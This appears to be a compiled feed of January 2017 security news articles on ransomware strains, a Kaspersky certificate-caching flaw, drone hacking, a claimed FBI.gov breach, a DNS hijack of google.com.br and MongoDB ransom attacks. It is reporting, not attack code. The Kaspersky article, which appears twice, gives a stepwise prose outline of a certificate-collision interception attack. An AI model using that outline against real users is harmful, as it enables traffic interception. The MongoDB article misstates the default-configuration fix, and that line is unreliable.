Recently experts from MalwareHunterTeam discovered FireCrypt ransomware, a threat that comes as a malware building kit and includes DDoS code.
Ransomware has become one of the fastest growing threats, new malware implements sophisticated features to avoid detection and rapidly spread among the greatest number of machines.

Recently experts from MalwareHunterTeam discovered a new strain of ransomware dubbed FireCrypt, that includes also a component to launch DDoS attacks.

The experts noticed that FireCrypt continuously connects to s certain URL and downloads content from it and saves it to the local machine’s %Temp% folder. In this way, the malware fills the machine with junk files, the URL is hardcoded in the source code of the malware.

The DDoS component analyzed by the researchers targets the official portal of Pakistan’s Telecommunication Authority (http://www.pta.gov(.)pk/index.php) and downloads the content to a file in the %Temp% folder.

The FireCrypt ransomware is created with a malware builder dubbed BleedGreen and leverages a command-line application that automates the process of putting FireCrypt samples together. BleedGreen allows to rapidly customize the ransomware generating a unique executable with a custom name and a file icon chosen by the creator.

According to the malware researchers the ransomware builder is very trivial.

“Compared to other ransomware builders, this is a very low-end application. Similar builders usually allow crooks to customize a wider set of options, such as the Bitcoin address where to receive payments, the ransom demand value, contact email address, and more.” states a blog post published by Bleepingcomputer.com.


The builder is able to disguise the FireCrypt executable under a PDF or DOC icon, it is also able to make small changes to the binary to make harder the ransomware detection.

The infection process starts when a victim’s launches the executable (EXE file) generated by the builder. The ransomware first kills the Task Manager (taskmgr.exe) process and starts encrypting user’s files with AES-256 encryption.

Files encrypted by FireCrypt are easy to recognize because the malware appends the .firecrypt extension the file name. The ransomware drops a ransom note on the desktop that is identical to that used by the Deadly for a Good Purpose Ransomware and the two malware present many similarities.

“Compared to FireCrypt, the only difference is that the Deadly for a Good Purpose Ransomware also featured a logo at the top of the ransom note, now missing in FireCrypt. But, at a close inspection of Deadly’s source code, MalwareHunterTeam was able to discover that both ransomware versions used the same email and Bitcoin addresses, showing a clear connection between the two, with FireCrypt being a rebranded version of the original Deadly for a Good Purpose Ransomware.” continues the post on Bleepingcomputer.

Let’s close with a reflection on the DDoS component, the target URL cannot be modified by the ransomware builder and the DDoS attack is not effective because it requires to infect a huge number of PCs at the same time that would also be connected to the Internet simultaneously.

Kaspersky fixing a serious problem with inspection digital certificates

5.1.2017 securityaffairs Vulnerebility

Google hacker Tavis Ormandy discovered a serious flaw that affects the Kaspersky antivirus software and the way it manages inspection digital certificates.
Experts from Kaspersky are solving a problem that disabled certificate validation for 400 million users. The problem was spotted by the notorious Google hacker Tavis Ormandy, the vulnerability affects the Kaspersky antivirus software and the way it used certificates to analyze encrypted traffic.

The security firm is a trusted CA, the Kaspersky Anti-Virus Personal Root, and uses its digital certificate for the traffic inspection, in this way it is able to decrypt it and analyze scanning for malicious patterns.

“In order to inspect encrypted data streams using SSL/TLS, Kasperky installs a WFP driver to intercept all outgoing HTTPS connections. They effectively proxy SSL connections, inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on-the-fly. This is why if you examine a certificate when using Kaspersky Antivirus, the issuer appears to be “Kaspersky Anti-Virus Personal Root”.” Ormandy wrote in a security advisory.

The process implemented by Kaspersky for certificate interception has previously resulted in serious vulnerabilities. Now the experts discovered other issues such as the way leaf certificates are cached that leverages on an extremely naive fingerprinting technique.

“Kaspersky cache recently generated certificates in memory in case the user agent initiates another connection. In order to do this, Kaspersky fetches the certificate chain and then checks if it’s already generated a matching leaf certificate in the cache. If it has, it just grabs the existing certificate and private key and then reuses it for the new connection.” explained the expert.

“The cache is a binary tree, and as new leaf certificates and keys are generated, they’re inserted using the first 32 bits of MD5(serialNumber||issuer) as the key. If a match is found for a key, they just pull the previously generated certificate and key out of the binary tree and start using it to relay data to the user-agent.”

It is easy to understand that a 32bit key open to brute-forcing attacks to generate a collision in a few seconds. An attacker can produce a collision with other certificates.

Ormandy also provided a description of the attack:

Mallory wants to intercept mail.google.com traffic, for which the 32bit key is 0xdeadbeef.
Mallory sends you the real leaf certificate for mail.google.com, which Kaspersky validates and then generates its own certificate and key for.
On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let’s say attacker.com)
Now Mallory redirects DNS for mail.google.com to attacker.com, Kaspersky starts using their cached certificate and the attacker has complete control of mail.google.com.
Ormandy also provided a proof of the bug forcing a collision between Hacker News and manchesterct.gov website.

“You can reproduce this bug, by visiting https://autodiscover.manchesterct.gov, then https://news.ycombinator.com and observing that the content is signed by the wrong certificate.” he added. “So if you use Kaspersky Antivirus in Manchester, Connecticut and were wondering why Hacker News didn’t work sometimes, it’s because of a critical vulnerability that has effectively disabled SSL certificate validation for all 400 million Kaspersky users.”
The expert also provided the C source code that it is possible to use to generate a colliding certificate for testing.

The case of flying saucer – Highway to the Danger Drone
5.1.2017 securityaffairs IT

One of the most discussed topics these days are the various nefarious uses that a Drone can be put to or just flown where they shouldn’t be.
2016 has been an eventful year bagged with mixed sentiments around the US presidential election, Brexit and Global terrorism striking the World’s news outlets. Simultaneously not far behind are the debates to seek, understand innovative venues/loopholes that have the potential to create havoc globally. One of the most discussed topics these days are the various nefarious uses that Drones can be put to or just flown where they shouldn’t be.

Drone Pilots capabilities to fly a drone into restricted areas or the risk of harming others is a topic for another day. Here in this short blog, we have tried to look at the various strategies Governments and Aviation Authorities have attempted to instigate to curb the menace only to see a threat evolving which poses a danger to the drones themselves.

So just what is a drone anyway? For the sake of argument let’s focus on the type of aircraft that you can purchase as a consumer for Video and Photography purposes (as opposed to the firing missiles and blow up things type). The world’s media has slapped the label of “Drone” onto any Quadrocopter, Octocopter or any other modern platform without actually investigating the differences between commercial platform, military devices and traditional models. Essentially our UAV (Unmanned Aerial Vehicle -which is the correct term!) has four components:

Power supply (typically a high power Li-Po Battery)
Propulsion units (4+ motors)
Transmitter (Video/Photo) / Receiver
Motherboard (the Flight controller)
Up until number 3 we were in the same ballpark as remote control helicopters and other model aircraft, which are controlled with servos according to the radio signals. However, with the introduction of the Motherboard we now have a flying computer with just as many undisclosed security issues as any other Internet of Things (IoT) device. Just because there isn’t a cable connected to the device does not mean that it is not susceptible to attack. For a clear breakdown of what is and isn’t a drone we have the following:

Model Aircraft Remote control only, no preprogrammed flight paths etc.
Drone Equipped with a flight computer, however, has no ability to follow pre- programmed path, nor does it have any built-in intelligence
Unmanned Aerial Vehicle (UAV) Encompasses all of the features seen in a drone but has additional intelligence features (Object Tracking, Terrain/Hazard avoidance etc.)
Unmanned Aerial System (UAS) All components seen in a UAV with additional support equipment (Base Station etc.)
So let’s have a look at some of the ways that have been identified to remove consumer UAVs from the air.

Shotgun: Eh, think we get this one! The US town of Deer Trail Colorado even attempted to enact a law to allow residents to hunt for federal UAV’s and shoot them down!

Net: Police forces and organizers of sporting events around the world have been trialing nets which are launched from a bazooka. This expands in the air and fowls the UAV’s rotor blades bringing it crashing to earth. There are also other slightly less destructive methods used where nets are carried by other larger UAVs; this approach has been adopted by the police force in Tokyo[1]. These again snare the rotor blades and are designed to capture the errant flying machine rather than send it crashing to the ground and onto potential pedestrians.

RF Generator (Denial of Service!) Or more simply a UAV Radio signal jammer. These devices overpower the radio signals (typically 2.4Ghz for most commercial UAVs which is the same range as standard Wi-Fi networks, Bluetooth connections, microwave ovens, car alarms, baby monitors, and ZigBee devices) with white noise causing the UAV to return to it’s “Home” position if this has been set (or is available) or at the very least severe the control from the Pilot. However, it should be noted that these devices themselves are highly illegal in most countries[2]. Some commercial firms are investigating Jamming Guns which target a narrow window and allow the operator to aim at the offending UAV without affecting other services.

Exploitation The takeover of the UAV’s flight systems by an outside attacker by various technical means allowing the attacker to have complete control of the system for their own purposes. The owner/pilot is locked out and has no way of controlling the system.

Hacking UAVs is not new with the first high profile case being of an RQ-170 Sentinel stealth drone, a key weapon in the intelligence gathering arsenal of the US Central Intelligence Agency (CIA); the drone was diverted and captured by the Iranians in December 2011. In this case, the Iranian military had identified that the US Military utilized encrypted GPS frequencies for its control systems. They first jammed the drone’s communications link to its ground controllers (which forced the drone into autopilot mode) this also had the effect of forcing the drone to search for unencrypted commercial control channels. The Iranian attackers spoofed these signals sending wrong GPS coordinates tricking the drone into believing it was at its home base in Afghanistan, thus landing on Iranian territory to the welcoming arms of its attackers. It should be noted that the US Military disputed this account and stated that it was a system malfunction; however subsequently researchers have been able to reproduce the incident with commercial UAVs using encrypted GPS signals.

Security Analysts and Hackers alike have been investigating these types of attacks for some time now Samy Kamkar (an Independent researcher) created a program called “dronestrike” in 2013 where he mounted a Raspberry Pi computer running his code on his Parrot AR UAV 2.0 along with a wireless transmitter[3]. When his UAV was flown in the vicinity of another parrot UAV the dronestrike program would make a connection to the victim UAV and disconnect the owner/pilot and take control of the system itself.

Earlier this year Johns Hopkins University[4] set its capstone project for Master’s Degree students. The students’ task was to conduct wireless pen testing on a consumer UAV and then take what they had identified and craft exploits to attack the system. Three various strategies were identified all of which successfully broke the connection to the pilot:

Denial of Service: The UAV was bombarded with over 1,000 wireless connection requests in a short period of time; each connection attempt asked to take control of the aircraft. This overloaded the UAV’s CPU causing it to shut down.
Buffer Overflow: In this scenario, an exceptionally large data packet was sent to the UAV. This exceeded the buffer in the UAV’s flight application causing the aircraft to crash.
Spoofing: The third scenario utilized an attack against the controller rather than the UAV. A fake packet was sent to the controller impersonating the UAV itself. The Controller severed the connection with the real UAV resulting in the aircraft making an emergency landing. XBee – Spectral analysis is seen to be utilized aggressively here.
These three types of attacks are nothing new to Cyber Security Analysts with these types of attacks occurring daily in Enterprise computer systems. But surely we as an industry don’t really have to be that worried about this, as these are only isolated case for hobbyist fliers? Think again, a UAV is a flying computer. Computers get hacked. Period!


To add complication to this many logistical firms are trialing UAV delivery systems including Amazon, DHL and Domino’s Pizza to name but a few. Amazon has already been awarded a patent for the flying warehouse, (AFC) an airborne fulfillment center. The notion is that AFC could be used as a launch pad for drones to make local deliveries. The approved patents highlight that AFC would be housed at about 45,000 feet allowing UAVs to be stocked, deployed and flown as necessary.

With the above development moving forward the possibility of hacking into a UAV and divert it without the owner knowing where it has gone will be a massive incentive for criminals seeking to steal the deliveries flying over their heads. With the assistance of insiders within the delivery firm the criminals can target specific cargos. Already we have seen evidence where attackers are easily able to intercept the operator’s command at a distance up to 2 kilometers and spoof its own. At a distance of 100 meters, WEP can be easily cracked and the drone can be stolen.

A number of firms are now looking to UAV’s to provide a mobile security platform for organizations with large estates or in the case of smaller UAV’s warehouse security. The opportunity to attack these platforms is twofold. Firstly an attacker who is able to take control of the UAV is then able to turn it’s “eyes” away from any intruders on the ground. Secondly and more worrying is where the attacker diverts the drone, lands it and attaches their own monitoring equipment cameras with transmitting equipment etc. to the aircraft. When this is returned to the control of the automated system/pilot the UAV will continue about it’s tasks as though nothing has happened, all the while becoming a physical Trojan Horse to the attached monitoring equipment. This could lead to the loss of trade secrets with the likes of the indoor warehouse UAVs. This kind of attack can also be used to kill out market competition, not to forget current 70% of the commercial drone market is held by Chinese DaJiang Innovation technology (DJI)

One threat vector, which is already being utilized, is where criminal gangs are utilizing UAV’s to smuggle drugs into prisons for waiting for inmates. Whilst this is already occurring, the UAV’s themselves have either been purchased or stolen from their owner’s residencies. To have the ability to hack into a UAV take over it and then use it for your own purposes removes a great deal of risk and removes all attribution to the criminals when and if the UAV is captured by Prison staff. The ability to steal a UAV in flight is going to be a great temptation to criminals.

On a relevant note there is also a psychological dimension as the drone pilot while operating at a distance can be in a sense detached from the local context and culture. This may trigger the creation of dream-world/ gaming environment thus detaching from the physical reality and risking operator behavior towards professional reasonability and social mores. [5]

What we have seen in this blog is that UAV’s, or drones (if you must!) are just like any system which relies upon a computer to operate. They can be hacked and taken over for many nefarious activities and we have only just seen the beginning. When the delivery platforms take to the air (pun intended) cyber criminals are going to have a field day!

We are truly on the highway to the Danger Zone.

[1] http://www.telegraph.co.uk/technology/2016/01/21/tokyo-police-are-using-drones-with-nets-to-catch-other-drones/

[2] https://www.fcc.gov/general/jammer-enforcement

[3] https://www.youtube.com/watch?v=EHKV01YQX_w

[4] http://releases.jhu.edu/2016/06/08/johns-hopkins-team-makes-hobby-drones-crash-to-expose-design-flaws/

[5] http://releases.jhu.edu/2016/06/08/johns-hopkins-team-makes-hobby-drones-crash-to-expose-design-flaws/

FBI website hacked by CyberZeist and data leaked online
5.1.2017 securityaffairs Hacking

The notorious black hat hacker CyberZeist (@cyberzeist2) has broken into the FBI website FBI.gov and leaked data on Pastebin.

The hacker leaked the FBI.GOV accounts that he found in several backup files (acc_102016.bck, acc_112016.bck, old_acc16.bck, etc).
Leaked records contain accounts data, including names, SHA1 Encrypted Passwords, SHA1 salts, and emails.

The intrusion occurred on December 22, 2016, the hacker revealed to have exploited a zero-day vulnerability in the Plone Content Management System

“Going back to 22nd December 2016, I tweeted about a 0day vulnerability in Plone CMS which is considered as the most secure CMS till date. This CMS is used by many top
agencies including FBI”

FBI hacked

CyberZeist explained that he did not find the zero-day in CMS he exploited, he was just tasked to test it against the websites of the FBI and Amnesty. Other websites are potentially exposed to the same zero-day attack, including Intellectual Property Rights Coordination Center and EU Agency for Network Information and Security.

The vulnerability resides in some python modules of the CMS.

Other Vulnerable websites include EU Agency for Network Information and Security along with Intellectual Property Rights Coordination Center.

FBI hacked
The hacker also Tweeted an image of the FBI website that was down just after the hack.

FBI hacked

CyberZeist tested the 0-day because the vendor was too afraid to use it aginst the FBI website. The hacker noticed that while media from Germany and Russia published the news about the hack, but US based publishers ignored it.

According to CyberZeist, the FBI contacted him to pass on the leaks.

“I was contacted by various sources to pass on the leaks to them that I obtained after hacking FBI.GOV but I denied all of them. Why? just because I was waiting for FBI to
react on time. They didn’t directly react and I don’t know yet what are they up to, but at the time I was extracting my finds after hacking FBI.GOV,” he wrote.

The expert added further info on the attack, while experts at the FBI were working to fix the issue, he noticed that the Plone 0day exploit was still working against the CMS backend.

“I couldn’t gain a root access (obviously!), but I was able to recon that they were running FreeBSD ver 6.2-RELEASE that dates back to 2007 with their own custom configurations. Their last reboot time was 15th December 2016 at 6:32 PM in the evening.” he added.

It seems that administrators of the websites made some regrettable errors, for example teh exposed the backup files on the same server, it was a joke for the hacker to access them even if he decided don’t publish them immediatelly.

“While exploiting FBI.GOV, it was clearly evident that their webmaster had a very lazy attitude as he/she had kept the backup files (.bck extension) on that same folder
where the site root was placed (Thank you Webmaster!), but still I didn’t leak out the whole contents of the backup files, instead I tweeted out my findings and thought to
wait for FBI’s response”

FBI hacked

Now let’s sit and wait for the FBI’s response.I obviously cannot publish the 0day attack vector myself as

The hacker confirmed that the 0-day is offered for sale on Tor by a hacker that goes by the moniker “lo4fer.” Once this 0day is no longer being sold, I will tweet out the Plone CMS 0day attack vector myself.

“Once this 0day is no longer being sold, I will tweet out the Plone CMS 0day attack vector myself.” CyberZeist added.

This isn’t the first time CyberZeist hacked the website of the Federal Bureau of Investigation, in 2011 when he was one of the members of the Anonymous collective he broke into the database of the law enforcement agency.

Let’s close with a curiosity … CyberZeist is asking you to chose the next target.


The hacker is very popular, among his victims, there are Barclays, Tesco Bank and the MI5.

To remain in touch with CyberZeist visit his page on Pastebin


11GB archive of Top Secret US SOCOM data accidentally leaked
5.1.2017 securityaffairs Incindent

The popular security expert Chris Vickery discovered a 11GB archive of Top Secret US SOCOM data that was accidentally leaked.
A subcontractor of the Pentagon has exposed top-secret information of the US Military Special Operations Command (SOCOM) medics.
Exposed records include names, locations, Social Security Numbers, and salaries of the Military SOCOM personnel, the database also included names and locations of at least two analysts of Special Forces. Analysts data have Top Secret government clearance.

The precious archive was accessible on the web and data stored in without encryption, a 11-gigabytes gift to nosy people.

The database was discovered by the popular researcher Chris Vickery, the same expert that discovered several open MongoDB exposed on the Internet.

“A recent data breach discovery of mine contained the names, locations, Social Security Numbers, salaries, and assigned units for scores of psychologists, and other healthcare professionals, deployed within the US Military’s Special Operations Command (SOCOM). Not a single username or password was guarding this intel, which weighed in at over 11 gigs.” reads a blog post published by Vickery.

Vickery discovered the precious archive and reported it to Potomac Healthcare Solutions, the company that provides healthcare workers to the US Government through Booz Allen Hamilton.
The archive includes also pay scales and residency of psychologists and employees at SOCOM.

Experts at Potomac Healthcare Solutions promptly fixed the issue, even if they initially did not seem to take the claim seriously.

“It is not presently known why an unprotected remote synchronization (rsync) service was active at an IP address tied to Potomac,” added Vickery.

“It shouldn’t take over an hour to contact your IT guy and kill an rsync daemon.”

The exposed data in the wrong hand could allow attacks to conduct a wide range of malicious activities, from kidnapping to scams.

“It’s not hard to imagine a Hollywood plotline in which a situation like this results in someone being kidnapped or blackmailed for information,” he says.

“Let’s hope that I was the only outsider to come across this gem.”

In December 2015 the security expert Chris Vickery discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

Did someone hack the Brazilian google.com.br?
5.1.2017 securityaffairs Hacking

Many users speculated about a possible compromise of the address of www.google.com.br. Did someone hack it? Let’s see what has happened.
Two days ago, we followed many news and comments regarding the compromise of the address www.google.com.br. At the beginning, many (me included) discredited the news, however, big online portals quickly started to propagate the event. People close to me also reported being accessing the invalid content and ask me for help.

G1 Portal (http://g1.globo.com/tecnologia/noticia/google-nega-ter-sido-alvo-de-hackers-no-brasil-entenda.ghtml) brought some up-to-date information about the fact, including the official answer by Google:

“Some internet users in Brazil faced problems accessing google.com.br due to compromised DNS servers: that means, the malicious change of the routing configuration of those DNS servers, taking the user to a different website than the desired one”, informs Google in its note to G1.

“Google is not responsible by the affected DNS servers, whence notified the administrators, which fixed the problem in 30 minutes. The affected users may also switch their network DNS server, as the Google system was not affected”, Google assures.

This notification is split into two parts. At the first part, we analyze the technique used in the incident by digging up public information from DNS servers cache which retained the swapped “google.com.br” domain content while it was compromised. At the second part, based on the technical analysis, we make our deductions and conclusions about the case and provide a few preventive security recommendations.

Situation Analysis
For this analysis, we used an environment whose users were still seeing the incorrect content while accessing www.google.com.br. Following, the technical details of the performed procedures.

1.1. Address Resolution www.google.com.br

While resolving “www.google.com.br”, we obtained the IP address as a response, as seen in Picture 1.

Picture 1 – Invalid address returned by www.google.com.br
Picture 1 – Invalid address returned by www.google.com.br

Using “whois”, we saw that the address IP does not belong to Google, but to a Bulgarian entity, as can be seen in Picture 2.

hack www.google.com.br
Picture 2 – Entity responsible for the IP address

The same query to the address “www.google.com.br” from an environment which shows the legitimate Google page returns the IP address (Picture 3).

Picture 3 – Result is the legitimate Google IP address

As seen in the analysis, it was possible to validate that the invalid content was not hosted on an address from Google, that is, the content of the Google website was not altered. There is yet to explain why the users were being taken to the wrong address. We continue our analysis.

1.2. DNS Cache Analysis

We begin now our search of a DNS server whose cache is pointing to the invalid IP address for “www.google.com.br”, alas, The goal is to find out which DNS server is returning the invalid IP. After finding one such server, we fetch its cache with the PowerShell command Show-DnsServerCache.

Below, the cache address entries for the “*google.com.br” addresses:

Table 1 – Cache from a DNS server during the incident with the domain google.com.br

Notice that the SOA (Start of Authority) entry, the registry that identifies the DNS server responsible for “google.com.br” zone points to the address “ns1-leader.vivawebhost.com”. The address resolves to IP, whose responsible is the same entity of IP

Just to be sure, we did a DNS consult using the address www.google.com.br pointing to the DNS server ns1-leader.vivawebhost.com. The first attempt returned a timeout error – likely because the server was being strangled by the number of requests. In our second try, the address was resolved. Exactly the same IP users were being directed, as seen in Picture 4.

Picture 4 – The consult result to the address www.google.com.br on the DNS server used for the attack

To be sure of the cache information, we did consult the SOA registry pointing to the address ns1-leader.vivawebhost.com.

Picture 5 – Result for the SOA query with google.com.br at the DNS server used during the attack

The results for the same query for a legitimate Google environment should return the following:

Picture 6 – Result for the legitimate domain

We did then query the domain “google.com.br” at registro.br, the entity responsible for “.br” domains. The result shows that the moment this report was being written, the DNS servers responsible for the domain are ns1.google.com, ns2.google.com, ns3.google.com e ns4.google.com. As expected, there are no records pointing to the invalid address ns1-leader.vivawebhost.com.

Picture 7 – Querying the domain “google.com.br” at Jan. 03, 2017 after the incident was resolved

A identified point of attention is the date of the last domain update at registro.br: Jan. 03, 2017, the day of the incident.

2. Conclusion

These analysis results make us believe the attacked managed, some way, to access the “google.com.br” domains configuration at registro.br and change it to point to ns1-leader.vivawebhost.com and ns2-leader.vivawebhost.com. This type of attack is known as “domain kidnapping”.

While the values of the DNS servers were adulterated, users trying to access www.google.com.br were taken to the incorrect address. As the response to the identified incident, the administrators responsible for the “google.com.br” domain with registro.br quickly reverted the configuration to the original values.

As the attackers used the TTL (time to live) value of 86400 seconds (24 hours), the DNS servers which refreshed their Google address at the time window will be kept handing over the invalid information for a long period. To speed things up, in case this problem is affecting your organization, I suggest you clean your DNS server cache. An easy way to do this is by resetting your DNS service.

The problem could have been worse. An attack of this kind has great damage potential for the organization which owns the Internet domain as well as for users that access the address. We list a few example below (none happened this time, though):

The address for which the users are redirected to could infect them with malicious code. This is usually done by advertising a fake software update.
The attacker could have redirected the user’s e-mails for the kidnapped domain to a server under its control and access the content.
By simulating an SMTP/IMAP/IMAPs server, the attackers could have stolen domain user credentials during the authentication attempt.
In case you delegate the task of administering your Internet domains to a third party organization, we recommend you to be sure that they follow access management good security practices for Domain Registry entities, like having the second authentication factor enabled.

For more information regarding domain kidnapping, access the article written by me at the end of the last year, describing a case study through this link.

Koolova Ransomware decrypts files if victims read 2 posts about Ransomware
5.1.2017 securityaffairs

The Koolova ransomware will decrypt the encrypted files for free it the victim read two blog posts about how to avoid ransomware infection.
Ransomware authors are very creative, in the last here we assisted a rapid evolution of the cyber extortion practice. Ransomware has become one of the fastest growing threats, new malware implements sophisticated features to avoid detection.

Recently security experts from MalwareHunterTeam spotted a singular strain of ransomware dubbed Popcorn Time that implemented an interesting mechanism to improve its efficiency.This ransomware comes with a singular feature, it allows victims to either pay up or they can opt to infect two others using a referral link. Then is the two other potential victims pay the ransom the original target receives a free key to unlock his encrypted files.

Now a new strain of ransomware dubbed Koolova appeared in the wild with a very singular feature. The Koolova ransomware will decrypt the encrypted files for free it the victim read two articles about how to avoid ransomware infection.
Once the Koolova ransomware infected a machine, it encrypts the files and then displays a warning screen where the text instructs the victim to open and read two awareness posts before they can get the ransomware decryption key.
Then Koolova starts a countdown that if gets to zero, the ransomware will definitively delete the files.

The two blog posts that the Koolova ransomware wants victims to read are:Google Security Blog called

“Stay safe while browsing” from Google Security Blog.
“Jigsaw Ransomware Decrypted: Will delete your files until you pay the Ransom” from BleepingComputer.
koolova ransomware
The threat was spotted by the security researcher Michael Gillespie, the malicious code appears to be a work in progress.

Visualizza l'immagine su TwitterVisualizza l'immagine su TwitterVisualizza l'immagine su TwitterVisualizza l'immagine su Twitter
Michael Gillespie @demonslay335
#Koolova #Ransomware based on #HiddenTear decrypts your files if you read @BleepinComputer & @Google articles on #Jigsaw and online security
00:29 - 19 Dic 2016
23 23 Retweet 19 19 Mi piace
“Koolova will encrypt a victim’s files and then display a screen similar to the Jigsaw Ransomware where the text is slowly shown on the screen. This text will tell the victim that they must read two articles before they can get a decryption key, It then tells you that if you are too lazy to read two articles before the countdown gets to zero, like Jigsaw, it will delete the encrypted files. This is not an idle threat as actually does delete the files.” reported BleepingComputer.com.

Once the victim reads both articles, he can rescue the encrypted files by clicking on the Decrypt My Files (the malware shows the string “Decripta i Miei File” which is Italian Language). The button “Decripta i Miei File” becomes available, when the user click on it the Koolova ransowmare will contact C&C server to get the decryption key.

Clearly, the author of this malware hasn’t developed it profit but just to spread awareness.

Kaspersky fixing a serious problem with inspection digital certificates

4.1.2017 securityaffairs Vulnerebility

Google hacker Tavis Ormandy discovered a serious flaw that affects the Kaspersky antivirus software and the way it manages inspection digital certificates.
Experts from Kaspersky are solving a problem that disabled certificate validation for 400 million users. The problem was spotted by the notorious Google hacker Tavis Ormandy, the vulnerability affects the Kaspersky antivirus software and the way it used certificates to analyze encrypted traffic.

The security firm is a trusted CA, the Kaspersky Anti-Virus Personal Root, and uses its digital certificate for the traffic inspection, in this way it is able to decrypt it and analyze scanning for malicious patterns.

“In order to inspect encrypted data streams using SSL/TLS, Kasperky installs a WFP driver to intercept all outgoing HTTPS connections. They effectively proxy SSL connections, inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on-the-fly. This is why if you examine a certificate when using Kaspersky Antivirus, the issuer appears to be “Kaspersky Anti-Virus Personal Root”.” Ormandy wrote in a security advisory.

The process implemented by Kaspersky for certificate interception has previously resulted in serious vulnerabilities. Now the experts discovered other issues such as the way leaf certificates are cached that leverages on an extremely naive fingerprinting technique.

“Kaspersky cache recently generated certificates in memory in case the user agent initiates another connection. In order to do this, Kaspersky fetches the certificate chain and then checks if it’s already generated a matching leaf certificate in the cache. If it has, it just grabs the existing certificate and private key and then reuses it for the new connection.” explained the expert.

“The cache is a binary tree, and as new leaf certificates and keys are generated, they’re inserted using the first 32 bits of MD5(serialNumber||issuer) as the key. If a match is found for a key, they just pull the previously generated certificate and key out of the binary tree and start using it to relay data to the user-agent.”

It is easy to understand that a 32bit key open to brute-forcing attacks to generate a collision in a few seconds. An attacker can produce a collision with other certificates.

Ormandy also provided a description of the attack:

Mallory wants to intercept mail.google.com traffic, for which the 32bit key is 0xdeadbeef.
Mallory sends you the real leaf certificate for mail.google.com, which Kaspersky validates and then generates its own certificate and key for.
On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let’s say attacker.com)
Now Mallory redirects DNS for mail.google.com to attacker.com, Kaspersky starts using their cached certificate and the attacker has complete control of mail.google.com.
Ormandy also provided a proof of the bug forcing a collision between Hacker News and manchesterct.gov website.

“You can reproduce this bug, by visiting https://autodiscover.manchesterct.gov, then https://news.ycombinator.com and observing that the content is signed by the wrong certificate.” he added. “So if you use Kaspersky Antivirus in Manchester, Connecticut and were wondering why Hacker News didn’t work sometimes, it’s because of a critical vulnerability that has effectively disabled SSL certificate validation for all 400 million Kaspersky users.”

The expert also provided the C source code that it is possible to use to generate a colliding certificate for testing.

Someone Hijacking Unsecured MongoDB Databases for Ransom
4.1.2017 thehackernews Hacking
Nearly two years back, we warned users about publicly accessible MongoDB instances – almost 600 Terabytes (TB) – over the Internet which require no authentication, potentially leaving websites and servers at risk of hacking.
These MongoDB instances weren't exposed due to any flaw in its software, but due to a misconfiguration (bad security practice) that let any remote attacker access MongoDB databases without using any special hacking tool.
MongoDB later resolved the issue in the next version of its software by setting unrestricted remote access by default in the configuration, thousands of site administrators have not updated their servers yet.
But trust me, they'll now regret this!

A Hacker is now hijacking and wiping out unsecured MongoDB databases, but keeping a copy of those databases for asking administrators a ransom of 0.2 Bitcoins (nearly US$211) to return the lost data. So, admins without backups are left in a bind.
In fact, the rising price of Bitcoin even hints at some of its troubles. At the time od writing, 1 Bitcoin = USD1063.93.
Security researcher and co-founder of the GDI Foundation Victor Gevers (@0xDUDE) discovered the attacks and notified exposed non-password-protected MongoDB installations to owners via Twitter.
Gevers identified nearly 200 instances of a MongoDB installation that's been erased and held for ransom, while this number reached approximately 2,000 databases as of 4:00 p.m, as reported by John Matherly, the Founder of Shodan, where many exposed MongoDB databases can be found.
These attacks have been going on for over a week, targeting servers all over the world. It is believed that instead of encrypting the data, the attacker who goes by the name "harak1r1," ran a script that replaced the content of the database with the attacker's ransom note.
While accessing one of the open servers, Gevers found that in place of the database content, there is only one table, named "WARNING," which reads:
16 Victims Already Paid the Ransom
It appears that around 16 organizations so far have paid the ransom to the attacker.

Matherly has been warning of the dangers of exposed MongoDB installations since 2015, allowing an attacker to remotely access the databases over the Internet without the need of any form of authentication.
Matherly said the majority of publicly exposed 30,000 MongoDB instances run on cloud servers such as Amazon, Digital Ocean, Linode, and Internet service and hosting provider OVH and do so without authentication, making cloud services buggier than datacenter hosting.
How to Know if You've Been Hacked?
Check the MongoDB accounts to see if no one added a secret (admin) user.
Check the GridFS to look if someone stored any files there.
Check the log files to see who accessed the MongoDB.
How to Protect Yourself?
Enable authentication that provides you 'Defense in depth' if your network is compromised. Edit your MongoDB configuration file — auth = true.
Use firewalls — Disable remote access to the MongoDB, if possible. Admins are advised to use firewalls to protect the MongoDB installations by blocking access to port no. 27017.
Configure Bind_ip — Limit access to the server by binding local IP addresses.
Upgrade — Administrators are strongly recommended to upgrade their software to the latest release.
MongoDB is the most popular, open-source NoSQL database used by companies of all sizes, from eBay and Sourceforge to The New York Times and LinkedIn. Administrators are encouraged to follow a security checklist provided by the company.

ZeroNet could be a solution against censorship and much more
4.1.2017 securityaffairs Safety

ZeroNet is a new and revolutionary decentralized P2P internet that promise to avoid censorship and improve user privacy on the open web.
ZeroNet is a decentralized and open source web platform. It’s based on BitTorrent(p2p) technology and BitCoin cryptography. These features ensure a decentralized censorship-resistant network.

The contents published by users can never be deleted because they’re distributed directly to other visitors without any central server. The content remains online so long as at least one user serving it. It’s impossible to shut down websites in the ZeroNet.

“When a site is updated by its owner, all nodes serving that site (previous visitors) will receive only the incremental updates done to the site content.” states the official website of the project.

ZeroNet implements a network whereby users can access and surf websites that are hosted on other user’s machines, it doesn’t include centralized servers.

“It’s nowhere because it’s everywhere!” declares ZeroNet site

You can create a free website using ZeroNet. There are no costs for hosting because the website is stored automatically your website. This could be a challenge to web hosting companies. It is always online with no downtime and can be accessible if your internet is unavailable if you have visited the website previously.

The site owner can accept payment directly to the site address.

Is ZeroNet anonymous?
If you want to hide your IP address, ZeroNet supports Tor network. The level of anonymity implemented is the same of the one implemented for BitTorrent, but a combined use with the Tor network will allow protecting user’s anonymity.

ZeroNet is made to work with anonymity networks: you can easily hide your IP using the Tor network.

Furthermore, you don’t need to remember your password, because your account is protected by same cryptography as a Bitcoin wallet.


In order to ensure integrity files, when you visit a site you download a file named “content.json”, it contains all other file names with relative hashes and cryptographic signature by the site owner. Then you download other files and verify them using hashes included in the “content.json”. This prevents in some way the diffusion of corrupted files or malicious code.


